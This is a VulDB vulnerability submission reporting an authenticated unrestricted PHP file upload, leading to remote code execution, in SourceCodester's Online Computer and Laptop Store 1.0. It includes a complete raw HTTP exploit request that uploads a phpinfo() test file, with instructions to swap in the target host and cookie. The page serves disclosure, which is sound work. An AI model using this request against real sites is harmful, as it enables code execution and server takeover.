Submit #109687: Online Computer and Laptop Store Background RCEinfo

TitleOnline Computer and Laptop Store Background RCE
DescriptionBrief description: Online Computer and Laptop Store Background RCE reason:After uploading the file in the background code php-ocls\admin\system_info\index.php and clicking upload, the specific execution code location is: php-ocls\classes\SystemSettings.php There is no limit, just upload php directly to cause the execution file of RCE payload:Just modify the host and cookie in the payload --------------------------------------------------------------------------------------------------------------------------- POST /php-ocls/classes/SystemSettings.php?f=update_settings HTTP/1.1 Host: 192.168.5.139 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate, br X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------107417980941863249932677197760 Content-Length: 185 Origin: http://localhost Connection: keep-alive Referer: http://localhost/php-ocls/admin/?page=system_info Cookie: PHPSESSID=pu8agldg93unebq0kmn6upugn3 Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin -----------------------------107417980941863249932677197760 Content-Disposition: form-data; name="img"; filename="1.php" Content-Type: application/octet-stream <?php phpinfo();?> ---------------------------------------------------------------------------------------------------------------------------
Source⚠️ www.sourcecodester.com/php/16397/online-computer-and-laptop-store-using-php-and-mysql-source-code-free-download.html
User
 jsbae3449 (UID 30775)
Submission04/03/2023 18:11 (3 years ago)
Moderation04/04/2023 10:36 (16 hours later)
StatusAccepted
VulDB entry224841 [SourceCodester Online Computer and Laptop Store 1.0 index.php img unrestricted upload]
Points17

PreviousOverviewNext

Want to know what is going to be exploited?

We predict KEV entries!